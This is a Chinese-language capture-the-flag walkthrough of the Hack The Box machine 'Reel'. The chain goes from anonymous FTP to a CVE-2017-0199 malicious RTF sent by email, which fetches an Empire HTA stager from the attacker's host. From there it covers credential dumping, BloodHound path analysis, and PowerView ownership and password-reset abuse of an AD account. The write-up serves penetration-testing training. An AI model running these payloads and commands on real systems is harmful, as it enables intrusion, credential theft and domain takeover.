Reel
靶机地址:
https://www.hackthebox.eu/home/machines/profile/143
nmap -v -A -sV -sC 10.10.10.77
这是一台server2012 R2,有ssh、ftp、smtp服务,Active Directory域服务。
扫描出来的信息里面,可以看到ftp匿名登陆。
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?
Host script results:
|_clock-skew: mean: -47s, deviation: 2s, median: -49s
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2019-01-21T03:35:22+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2019-01-21 11:35:20
|_ start_date: 2019-01-21 07:54:45
使用ftp匿名登陆,然后mget *下载里面的内容,一共三个文件AppLocker.docx、readme.txt、Forwarding.docx
$ ftp
ftp> open
(to) 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:Rogerd): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18 11:19PM <DIR> documents
ftp> cd documents
250 CWD command successful.
ftp> mget *
mget AppLocker.docx?
200 PORT command successful.
cat readme.txt
让我们构造一个rtf的邮件。
那我们还要找到一个邮件地址。
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.%
查看其他两个word文档,其中一个无法直接打开,我们查看一些相关信息。
可以看到一个邮箱
exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 11.16
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 14 kB
File Modification Date/Time : 2019:01:21 12:01:36+08:00
File Access Date/Time : 2019:01:21 13:00:24+08:00
File Inode Change Date/Time : 2019:01:21 12:01:36+08:00
File Permissions : rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
打开AppLocker.docx
已启用,哈希规则对可执行文件,MSI和脚本(.ps1,.vbs,.cmd,.bat)有效
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
我们 尝试发送给nico@megabank.com ,并监听一个端口看是否有返回信息。
我们使用Exploit toolkit CVE-2017-0199 Microsoft Office RCE。它可以生成恶意RTF / PPSX文件
https://github.com/bhdresh/CVE-2017-0199
使用python监听
python -m SimpleHTTPServer 8000
使用python脚本CVE-2017-0199生成RTF,发送到指定邮箱
python cve-2017-0199_toolkit.py -M gen -t RTF -w TEST.RTF -u http://10.10.14.19:8000/reel.hta
使用sendEmail发送邮件
sendEmail -f rogerd@megabank.com -t nico@megabank.com -u RTF -m 'open file!' -a TEST.RTF -s 10.10.10.77
可以看到成功访问到8000端口
Empire是一个用于管理powershell会话的工具
我们使用Empire生成hta,然后通过发送到指定邮箱,使用python运行服务,把hta放在tmp文件下,接收方执行TEST.RTF就会远程访问我们提前生成好放在tmp文件夹下的hta文件。
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://10.10.10.14.19
(Empire: listeners/http) > execute
[*] Starting listener 'http'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: Do not use the development server in a production environment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) > back
(Empire: listeners) > usestager windows/hta
(Empire: stager/windows/hta) > set Listener http
(Empire: stager/windows/hta) > set OutFile /home/Rogerd/tools/CVE-2017-0199/reel.hta
(Empire: stager/windows/hta) > generate
[*] Stager output written out to: /home/Rogerd/tools/CVE-2017-0199/reel.hta
我们把reel.hta移动到tmp目录
然后启动python -m SimpleHTTPServer 8000
在使用sendEmail -f rogerd@megabank.com -t nico@megabank.com -u RTF -m 'open file!' -a TEST.RTF -s 10.10.10.77
我们已经拿到回弹回来的shell了
通过查看桌面发现几个文件,user.txt是第一个flag
(Empire: stager/windows/hta) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
G25L3MWT ps 10.10.10.77 REEL HTB\nico powershell 2468 5/0.0 2019-01-23 11:49:22
(Empire: agents) > interact G25L3MWT
查看cred.xml文件,这是一个powershell 远程管理的密码凭据
(Empire: G25L3MWT) > shell Get-Content cred.xml
[*] Tasked G25L3MWT to run TASK_SHELL
[*] Agent G25L3MWT tasked with task ID 19
(Empire: G25L3MWT) > [*] Agent G25L3MWT returned results.
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>
..Command execution completed.
通过这个cred.xml文件,我们查看tom的账户信息。
我们可以使用allchecks , 列举一些信息。我们可以看到nico的ssh服务的账号密码
(Empire: 7H9GMEV2) > usemodule privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > run
[*] Tasked 7H9GMEV2 to run TASK_CMD_JOB
[*] Agent 7H9GMEV2 tasked with task ID 26
[*] Tasked agent 7H9GMEV2 to run module powershell/privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > [*] Agent 7H9GMEV2 returned results.
Job started: 64FXBN
[*] Valid results returned by 10.10.10.77
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
ServiceName : ssh-agent
Path : C:\Program Files\OpenSSH\ssh-agent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'ssh-agent' -Path <HijackPath>
CanRestart : False
ServiceName : ssh-agent
Path : C:\Program Files\OpenSSH\ssh-agent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'ssh-agent' -Path <HijackPath>
CanRestart : False
ServiceName : sshd
Path : C:\Program Files\OpenSSH\sshd.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : NT SERVICE\SSHD
AbuseFunction : Write-ServiceBinary -Name 'sshd' -Path <HijackPath>
CanRestart : False
ServiceName : sshd
Path : C:\Program Files\OpenSSH\sshd.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : NT SERVICE\SSHD
AbuseFunction : Write-ServiceBinary -Name 'sshd' -Path <HijackPath>
CanRestart : False
DefaultDomainName : HTB
DefaultUserName : nico
DefaultPassword : 4dri@na2017!**
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml
我们通过ssh访问tom
ssh tom@10.10.10.77
1ts-mag1c!!!
在tom->Desktop->AD Audit->note.txt
大概的内容是提示我们找一个最短的攻击路径。
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
我们在tom->Desktop->AD Audit->BloodHound,我们查了一下资料了解到:
BloodHound使用图论来揭示Active Directory环境中隐藏的和通常无意的关系。攻击可以使用BloodHound轻松识别高度复杂的攻击路径,否则无法快速识别。防御者可以使用BloodHound来识别和消除那些相同的攻击路径。蓝队和红队都可以使用BloodHound轻松深入了解Active Directory环境中的权限关系。
安装BloodHound:
https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/
我们通过登陆tom
SharpHound.ps1替换这个文件(在这之前我们要把下载好的BloodHound->Ingestors->SharpHound.ps1放入8000web目录下。)
powershell "IEX (New-Object Net.Webclient).DownloadFile('http://10.10.14.19:8000/SharpHound.ps1','SharpHound.ps1')"
我们使用SharpHound.ps1生成一个报告并且下载下来
powershell -exec bypass
Import-Module ./SharpHound.ps1
invoke-bloodhound all
我们把生成好的报告下载下来,然后拖入BloodHound
scp -P 22 tom@10.10.10.77:"\"/C:/Users/tom/Desktop/AD Audit/BloodHound/Ingestors/20190124161418_BloodHound.zip\"" /tmp/
我们可以看到一共有18个用户,61个组
可以查看不同用户组的信息,我们查看backup_admin
我们通过搜索tom@HTB.LOCAL
设置set as starting Node 为tom
设置set as ending node 为backup_admin
可以看到,我们可以通过CLAIRE去访问backup_admin,然后tom拥有CLAIRE
我们可以右键WriteOwner打开hepl->info查看详细的信息
tom可以修改claire所有者、claire拥有backup_admin的写权限。
The user TOM@HTB.LOCAL has the ability to modify the owner of the user CLAIRE@HTB.LOCAL. Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.
我们可以先拿到claire再去拿backup_admin
这里提供了一个思路,通过PowerView更改所有权
我们可以参考powerview里面的文档进行配置
Set-DomainObjectOwner可以设置对象所有者的配置
Add-DomainObjectAcl可以写入DACL的配置
Set-DomainUserPassword可以使用重置用户密码的功能
1、选择Tom为Claire对象的所有者
2、允许Tom重置Claire密码。
3、修改密码
powershell -command "import-module .\PowerView.ps1; Set-DomainObjectOwner -Identity claire -OwnerIdentity Tom -Verbose; Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity Tom -Rights ResetPassword -Verbose; $pass=ConvertTo-SecureString "AbC!@#123" -AsPlainText -Force; Set-DomainUserPassword -Identity claire -AccountPassword $pass -Verbose"
我们参考攻击路径,把Claire放入Backup_admin组。
目录下没有powerview.ps1 ,我们从kali下载下来
powershell "IEX (New-Object Net.Webclient).DownloadFile('http://10.10.14.19:8000/PowerView.ps1','PowerView.ps1')"
powershell -command "import-module .\PowerView.ps1; Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity claire -Rights All -Verbose; Add-DomainGroupMember -Identity 'Backup_Admins' -Members 'claire' -Verbose"
这时候我们可以访问Administrator->Backup_Script文件夹了。
但是还是不能查看root.txt
这时候我们看到Backup_Script目录下有几个脚本,其中Backup_Script.ps1是一个备份脚本,可以拿到关键信息。
参考:
https://www.anquanke.com/post/id/85695
https://www.knowsec.net/archives/238/
https://www.harmj0y.net/blog/powershell/make-powerview-great-again/
https://github.com/ama21n/powershell/blob/master/PowerView.ps1